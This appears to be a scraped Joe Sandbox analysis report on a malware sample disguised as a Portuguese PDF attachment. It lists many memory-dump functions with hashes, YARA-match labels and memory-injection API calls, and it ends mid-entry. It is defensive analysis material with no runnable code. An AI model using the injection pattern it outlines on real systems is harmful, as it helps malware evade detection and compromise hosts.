                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 21a80846618245761aa32b135afb016404c6a86a19c12eba17331f12b68f9645
                        • Instruction ID: 0e355e7eb3d2c6b2a3b63f6272ff703e237f58e6c13a736f78fccf8371d51713
                        • Opcode Fuzzy Hash: 21a80846618245761aa32b135afb016404c6a86a19c12eba17331f12b68f9645
                        • Instruction Fuzzy Hash: 65A19972608388DBDF74CE69CDA47DE37A2FFA8350F95802ADD4A8B210D7B55A41DB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A835F, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 221COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: fffec6330022eae790832d8bfc0a7108ef26912c4d55c62b24d132acd173e074
                        • Instruction ID: fc78c3b861ebbae723c307c06fe005b7be2bc10b8d29164b18e80a4df571c4a4
                        • Opcode Fuzzy Hash: fffec6330022eae790832d8bfc0a7108ef26912c4d55c62b24d132acd173e074
                        • Instruction Fuzzy Hash: 9FA1A972608388DBDF74CE68CDA47DE37A2FFA8350F95802ADD4A8B210D7B45A41DB05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A83CB, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 208COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: f595d290d804ee6f4fc70097c8d4d4b7552bc32f6ff7c5a658e3f1a4f3188e3b
                        • Instruction ID: 06bdace4370f196345cc23125e6dd60c1019d9056c2b665342c6ab9e0be4a9f6
                        • Opcode Fuzzy Hash: f595d290d804ee6f4fc70097c8d4d4b7552bc32f6ff7c5a658e3f1a4f3188e3b
                        • Instruction Fuzzy Hash: 8D9199716083889BDF78CF65CDA47DE37A2FFA8350F94802ADD4A9B210D7B05A41DB05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A8463, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,A8250BDD,?,00000000,?,?,?,?,?,?,?,?,?,?,3FD39391), ref: 020A87B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: Nx|M
                        • API String ID: 3527976591-2341126701
                        • Opcode ID: 3efff7d47f4527f831b682f6808c98b27b8e44545f539b157cbfbc6df4af4839
                        • Instruction ID: 1601c58daf65791b5dae5cf2ede1dbff6e758965d461e8dc1393805ca92dce7d
                        • Opcode Fuzzy Hash: 3efff7d47f4527f831b682f6808c98b27b8e44545f539b157cbfbc6df4af4839
                        • Instruction Fuzzy Hash: 4D81A9B16083899BDF78DF65CDA47DE37A2FFA8350F80802ADD4A8B210D7755A41DB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A84FB, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 169nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,A8250BDD,?,00000000,?,?,?,?,?,?,?,?,?,?,3FD39391), ref: 020A87B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: Nx|M
                        • API String ID: 3527976591-2341126701
                        • Opcode ID: aae9419ec1f99b9634471595ab0d02f77eb592218d29aa1e5301da3e809e4ca0
                        • Instruction ID: a201ed554f1921fbaa19767bd80f1039cf1cff2e7b51795630e27c94cf7dd23f
                        • Opcode Fuzzy Hash: aae9419ec1f99b9634471595ab0d02f77eb592218d29aa1e5301da3e809e4ca0
                        • Instruction Fuzzy Hash: E77175B16083889FDF75DF64CDA4BDA3BA2FF68310F80802ADD4A8B210D7B55A45DB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A8547, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,A8250BDD,?,00000000,?,?,?,?,?,?,?,?,?,?,3FD39391), ref: 020A87B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: Nx|M
                        • API String ID: 3527976591-2341126701
                        • Opcode ID: c0c238d4dd4559f84325b13a1934ace4785fd49252190bc2a7825166c467e070
                        • Instruction ID: 8695da6e0992ed4e2d25a644d89e27a4b4d6f0647a0607ee55d35ef62c65880d
                        • Opcode Fuzzy Hash: c0c238d4dd4559f84325b13a1934ace4785fd49252190bc2a7825166c467e070
                        • Instruction Fuzzy Hash: DB7165B16083889BDF79DF64CDA47DA3BA2FF68310F80802ADD4A8B250D7B55A45DB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A85CB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,A8250BDD,?,00000000,?,?,?,?,?,?,?,?,?,?,3FD39391), ref: 020A87B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: Nx|M
                        • API String ID: 3527976591-2341126701
                        • Opcode ID: 1cc91faf19b531d4fa55457f766854463be5198680553966a01f6172f8a371c7
                        • Instruction ID: f67e44f79b42fbcd6d074f75ffa68e79d049594795156768218043fdb5ba5801
                        • Opcode Fuzzy Hash: 1cc91faf19b531d4fa55457f766854463be5198680553966a01f6172f8a371c7
                        • Instruction Fuzzy Hash: 9F6176B16083889FDF78DF64CDA8BDA3BA2FF58300F848029DD4A8A250DB755A45DF05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A942C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123memorynativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 020ABAAA: LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateLibraryLoadMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2616484454-1509114159
                        • Opcode ID: c84696f1c97a51b7546cc59844d3a3b2d749337762f640f5dc5585bf70fb018e
                        • Instruction ID: f379c65f1d504d53fe40f373950c5fcc83a68c4ba8d91a8504e12765f09270bf
                        • Opcode Fuzzy Hash: c84696f1c97a51b7546cc59844d3a3b2d749337762f640f5dc5585bf70fb018e
                        • Instruction Fuzzy Hash: 4B41CD75644389DFDB749EA8C9A5BEE77A1AF59380F84402ADC4E9B310D3308A40DB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A945F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122memorynativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 020ABAAA: LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateLibraryLoadMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2616484454-1509114159
                        • Opcode ID: 26f221377bd76d2dbb7369b411a4cced7a7606ce255476facacdfc0249eda8a7
                        • Instruction ID: 8952142621484ff3a598df41ed2f5cf469cab6ce6945974fb9c73a9103b0bf35
                        • Opcode Fuzzy Hash: 26f221377bd76d2dbb7369b411a4cced7a7606ce255476facacdfc0249eda8a7
                        • Instruction Fuzzy Hash: C541CBB5644389DFDB749EA9CDA5BEE77A1AF59380F84402EEC4E9B310D3308A40DB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A8663, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,A8250BDD,?,00000000,?,?,?,?,?,?,?,?,?,?,3FD39391), ref: 020A87B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: Nx|M
                        • API String ID: 3527976591-2341126701
                        • Opcode ID: 0bbedc1b86ea7dc61548e0c5d0e40882b70e11013dd906a69016021527f66597
                        • Instruction ID: 3784c475a4195f556d55f17607c7004fc558cbdd2035ffb29cb341f45912aa14
                        • Opcode Fuzzy Hash: 0bbedc1b86ea7dc61548e0c5d0e40882b70e11013dd906a69016021527f66597
                        • Instruction Fuzzy Hash: 865154B16083889FDF78DF64CCA87DA3AA2FF58300F808029D95A9A250DB755A55DF05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A94C3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119memorynativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 020ABAAA: LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateLibraryLoadMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2616484454-1509114159
                        • Opcode ID: a4b8934107d2a8bdf931c59e06fb2db09d1cc41cb1e3d98f023062db86e4a135
                        • Instruction ID: e712f003aac7b67fa94e7894345a4a141c728b195f04c3d359d8dd2d304e7e6e
                        • Opcode Fuzzy Hash: a4b8934107d2a8bdf931c59e06fb2db09d1cc41cb1e3d98f023062db86e4a135
                        • Instruction Fuzzy Hash: DB41BC75644389DFDB749EA8C8A5BEE77A2AF59340F94402EED4E9B310D3308A40DB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A95BD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2167126740-1509114159
                        • Opcode ID: bef47045328f138ef80576fb4af4eaf6ef8868d9338300e49251e312f9e390c7
                        • Instruction ID: d291d0a92127b50386428daf9a3981cfefe4611b0353f591aacebdcf03eead94
                        • Opcode Fuzzy Hash: bef47045328f138ef80576fb4af4eaf6ef8868d9338300e49251e312f9e390c7
                        • Instruction Fuzzy Hash: 5141CF75704389DFDB249E79C8A6BED7BE2AF59340F54402DDC4A9B360D3308A44DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9523, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108memorynativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 020ABAAA: LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateLibraryLoadMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2616484454-1509114159
                        • Opcode ID: b9d08758ef724cb4a38f6b2a59844e18387a38213f3a51c540545dd5704ecf48
                        • Instruction ID: b5df9ab15845dceb93993fa0b3d7f7b42d7b591a6df31a2124fcacb3dfd0b942
                        • Opcode Fuzzy Hash: b9d08758ef724cb4a38f6b2a59844e18387a38213f3a51c540545dd5704ecf48
                        • Instruction Fuzzy Hash: 97419C75644389DFDB649EB9CDA5BEE77A2AF59380F84402DED4E97320D2308A40DB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A86E3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,A8250BDD,?,00000000,?,?,?,?,?,?,?,?,?,?,3FD39391), ref: 020A87B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: Nx|M
                        • API String ID: 3527976591-2341126701
                        • Opcode ID: 8368091341fd1a0ecc9a5b71e0262692c578055473e36894d16beb83434a1317
                        • Instruction ID: 8e3b33c375c81fea3bbb545d6833d111df72ab1c6991a77107819f566af10007
                        • Opcode Fuzzy Hash: 8368091341fd1a0ecc9a5b71e0262692c578055473e36894d16beb83434a1317
                        • Instruction Fuzzy Hash: 394144716093889FDF79DF64CCA8BDE36A2FF58300F848029DD1A8A250DB759A41DF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9593, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95memorynativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 020ABAAA: LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateLibraryLoadMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2616484454-1509114159
                        • Opcode ID: d11dd69e81e1816317c7e24419764ba82a6d8f959b561cf9a85aa6f8c7868fda
                        • Instruction ID: 115b9abd7375a05aaf6459079f48aa36505bb16c76b294dd962d8b39b6f2f9af
                        • Opcode Fuzzy Hash: d11dd69e81e1816317c7e24419764ba82a6d8f959b561cf9a85aa6f8c7868fda
                        • Instruction Fuzzy Hash: A231BEB5644389CFDB349F69CCA5BEE7BE2AF59380F44402AEC4E97320D2308A44DB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A8753, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,A8250BDD,?,00000000,?,?,?,?,?,?,?,?,?,?,3FD39391), ref: 020A87B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: Nx|M
                        • API String ID: 3527976591-2341126701
                        • Opcode ID: 09f2e8f244fd18a8e27d618cc8169f023132cf6f725621b71a265fed132c36d5
                        • Instruction ID: a04188f314bc6ab2941a9a37358978dae483eefdafba92e8a0f34a2f2dc2d4bb
                        • Opcode Fuzzy Hash: 09f2e8f244fd18a8e27d618cc8169f023132cf6f725621b71a265fed132c36d5
                        • Instruction Fuzzy Hash: 1B4145716092889FCF79DF64DCA4BDE3BB2FF58300F808029E95A8A250DB305A41DF15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A961B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2167126740-1509114159
                        • Opcode ID: 13fb3bff6aa8938f396ad9e0220113301779373fee7d75bf58bf1743fee7af69
                        • Instruction ID: c7de9dd0652b32f2fcac837abb45ff5ff74615cf9013223d53f2aa5cacb11564
                        • Opcode Fuzzy Hash: 13fb3bff6aa8938f396ad9e0220113301779373fee7d75bf58bf1743fee7af69
                        • Instruction Fuzzy Hash: BC315A75644789CFDB349E69CC95BEE7BA1AF59384F44402AEC4E9B360D2309A44DB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9635, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2167126740-1509114159
                        • Opcode ID: 23176e4b9b6bdbb0e73178563cf8b0aad6ac8cfe463e0785d5d11e105a6b2d77
                        • Instruction ID: 374abc4d2ae9474fb941379e308343b4c2bc141fe6ae875704f0f439b9365b87
                        • Opcode Fuzzy Hash: 23176e4b9b6bdbb0e73178563cf8b0aad6ac8cfe463e0785d5d11e105a6b2d77
                        • Instruction Fuzzy Hash: CE319CB1648788CFDB249E65CC957EEBBA1AF49354F44012EDC8E9B360D3749A44CB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A96CB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID: ;&{
                        • API String ID: 2167126740-1509114159
                        • Opcode ID: 0f79fb42c8d52d300ca2418ec5cd21ab8c176dcd23a074180e553dc4ad6561ae
                        • Instruction ID: 4793f0cbc764cb3052bc0deb502452c84aab6d6ab336657c0fe4440ae5e6f7f3
                        • Opcode Fuzzy Hash: 0f79fb42c8d52d300ca2418ec5cd21ab8c176dcd23a074180e553dc4ad6561ae
                        • Instruction Fuzzy Hash: FB216775609388CFDB209F29CC947EDBBA2AF4A340F84442AEC4A9B220C3309A40DB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A269B, Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 81ae42799214f1c494f24cae738fce3eb1495e84a2ccc9d3b4ff7bc3a26f4847
                        • Instruction ID: 57b959e500b1e245b777a45007161b0e0b1c058e01318b584897800766dd98e1
                        • Opcode Fuzzy Hash: 81ae42799214f1c494f24cae738fce3eb1495e84a2ccc9d3b4ff7bc3a26f4847
                        • Instruction Fuzzy Hash: 755188304083C69FD726CF78C8257EEBFA1AF43724F9482ADD8994B592C7311946DB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A912B, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,461EDBC4), ref: 020A9292
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: a06ce0018674ac73265868410ff0f8bc7c9004906bbb1dc82fc1f16684bb7f92
                        • Instruction ID: 23bbafdcc197d4fd274e200bbfa2b0cdbb9fecd83d5dc3ae81291fe8c2320293
                        • Opcode Fuzzy Hash: a06ce0018674ac73265868410ff0f8bc7c9004906bbb1dc82fc1f16684bb7f92
                        • Instruction Fuzzy Hash: 82214670648309DFCB6CAE74C97ABEEBAB5FF15340F80050EE88B96214C7315580DB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9099, Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,461EDBC4), ref: 020A9292
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 2f78621f4aa45784fe7da77a0e8c4d8189e434f1f5802f98ae091b76df0ac80f
                        • Instruction ID: 9b55fa2308166e738d3106941deb4fa43e36d60b993e44c5825be5123d6ab8c5
                        • Opcode Fuzzy Hash: 2f78621f4aa45784fe7da77a0e8c4d8189e434f1f5802f98ae091b76df0ac80f
                        • Instruction Fuzzy Hash: 8121D270648309DFDB6CAE74C97A7EE7AA1FF14340F80451EAD8B96254CB314680DB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A90CF, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,461EDBC4), ref: 020A9292
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 1abc8abd6de5a80171c01c792a7047fd09bb238976d597b6cfe0065138fe7561
                        • Instruction ID: b442fd75d0c8aa17dc2529895ceaf61bdf156ff383df069915f7d052ee222588
                        • Opcode Fuzzy Hash: 1abc8abd6de5a80171c01c792a7047fd09bb238976d597b6cfe0065138fe7561
                        • Instruction Fuzzy Hash: 4811E170648349CFDB6CAE78C97A7EE7AA1FF14340F80451EE98B96250CB314680DB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AA1B2, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 020A942C: NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        • LdrInitializeThunk.NTDLL ref: 020AA702
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateInitializeMemoryThunkVirtual
                        • String ID:
                        • API String ID: 3902809231-0
                        • Opcode ID: 8d099e8ef3762babaf70b9754e7a71d3ed57223ce49bcb739f1a05d35b44768c
                        • Instruction ID: efb36c6f5165e69a8129d9aa3e1f12853c5ae6cb9cf057c59631999f95fc7cd4
                        • Opcode Fuzzy Hash: 8d099e8ef3762babaf70b9754e7a71d3ed57223ce49bcb739f1a05d35b44768c
                        • Instruction Fuzzy Hash: 66115570309390D9C327ABE855B1A987FB2EF46318BD40A8DC090992D1CB2205C7EF89
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AE9C2, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtProtectVirtualMemory.NTDLL ref: 020AEA9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: 85e8b401d26782798bc925710cc6786a7be9c226a0ccb0a12476d29f23e58db4
                        • Instruction ID: 500de183ec542a28a640731d8d391c56c1563f3d3c2337b9c7ceca8664fc64e9
                        • Opcode Fuzzy Hash: 85e8b401d26782798bc925710cc6786a7be9c226a0ccb0a12476d29f23e58db4
                        • Instruction Fuzzy Hash: E4014F716043848FDB25CE2CCD546DE77E9FFE8300F45812EAC4AA7214D730AA42DB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9747, Relevance: 1.5, APIs: 1, Instructions: 37memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(-24A8B43B), ref: 020A9767
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 25d44db0a8561c11921144a0c56f6567ef23e3e887bc729d53193a12c52a77fc
                        • Instruction ID: c4c83f9c42c31ef4f3c1168b7f11bb198c53c9c17ce1f4380ba3987efcc3e180
                        • Opcode Fuzzy Hash: 25d44db0a8561c11921144a0c56f6567ef23e3e887bc729d53193a12c52a77fc
